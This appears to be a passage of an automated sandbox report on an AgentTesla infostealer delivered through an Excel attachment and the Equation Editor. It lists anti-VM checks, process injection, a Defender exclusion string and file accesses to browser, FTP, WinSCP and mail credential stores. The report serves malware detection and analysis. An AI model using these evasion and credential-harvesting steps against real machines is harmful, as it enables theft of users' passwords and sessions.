                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: AGG POWER RFQ.xlsxStream path 'EncryptedPackage' entropy: 7.99985102724 (max. 8.0)

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: tnvLnx.exe PID: 1664, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2908, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: tnvLnx.exe PID: 764, type: MEMORY
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\Public\vbc.exeWindow / User API: threadDelayed 9674
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeWindow / User API: threadDelayed 2968
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeWindow / User API: threadDelayed 9715
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2704Thread sleep time: -300000s >= -30000s
                      Source: C:\Users\Public\vbc.exe TID: 2864Thread sleep time: -104524s >= -30000s
                      Source: C:\Users\Public\vbc.exe TID: 2968Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\Public\vbc.exe TID: 3016Thread sleep time: -360000s >= -30000s
                      Source: C:\Users\Public\vbc.exe TID: 2312Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Users\Public\vbc.exe TID: 2312Thread sleep time: -120000s >= -30000s
                      Source: C:\Users\Public\vbc.exe TID: 2292Thread sleep count: 9674 > 30
                      Source: C:\Users\Public\vbc.exe TID: 856Thread sleep count: 65 > 30
                      Source: C:\Users\Public\vbc.exe TID: 2312Thread sleep count: 93 > 30
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2628Thread sleep time: -103694s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2612Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2432Thread sleep time: -300000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2724Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2724Thread sleep time: -90000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2676Thread sleep count: 2968 > 30
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2676Thread sleep count: 198 > 30
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2112Thread sleep time: -104455s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2664Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2548Thread sleep time: -60000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2656Thread sleep time: -300000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 3020Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 3020Thread sleep time: -120000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 260Thread sleep count: 9715 > 30
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2864Thread sleep count: 31 > 30
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 3020Thread sleep count: 96 > 30
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeLast function: Thread delayed
                      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 104524
                      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 30000
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeThread delayed: delay time: 103694
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeThread delayed: delay time: 30000
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeThread delayed: delay time: 104455
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeThread delayed: delay time: 30000
                      Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
                      Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                      Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
                      Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess token adjusted: Debug
                      Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeMemory written: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeMemory written: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe base: 400000 value starts with: 4D5A
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess created: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess created: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe
                      Source: vbc.exe, 00000005.00000002.2366923007.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: vbc.exe, 00000005.00000002.2366923007.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: vbc.exe, 00000005.00000002.2366923007.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: !Progman
                      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
                      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
                      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeQueries volume information: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeQueries volume information: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeQueries volume information: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeQueries volume information: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000007.00000002.2242803026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2366293471.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2222286152.0000000003409000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2366050589.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2155416176.0000000003409000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2243257481.0000000003329000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 4.2.vbc.exe.3553848.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.tnvLnx.exe.3553848.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.tnvLnx.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.tnvLnx.exe.3473848.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.tnvLnx.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.tnvLnx.exe.3473848.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.tnvLnx.exe.3553848.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.vbc.exe.3553848.4.raw.unpack, type: UNPACKEDPE
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000007.00000002.2242803026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2366293471.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2367132534.0000000002821000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2222286152.0000000003409000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2366050589.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2367095229.00000000027E2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2366999584.0000000002741000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2155416176.0000000003409000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2366705481.0000000002161000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2243257481.0000000003329000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: tnvLnx.exe PID: 1664, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2908, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1980, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: tnvLnx.exe PID: 152, type: MEMORY
                      Source: Yara matchFile source: 4.2.vbc.exe.3553848.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.tnvLnx.exe.3553848.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.tnvLnx.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.tnvLnx.exe.3473848.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.tnvLnx.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.tnvLnx.exe.3473848.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.tnvLnx.exe.3553848.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.vbc.exe.3553848.4.raw.unpack, type: UNPACKEDPE
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
                      Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2366999584.0000000002741000.00000004.00000001.sdmp, type: MEMORY
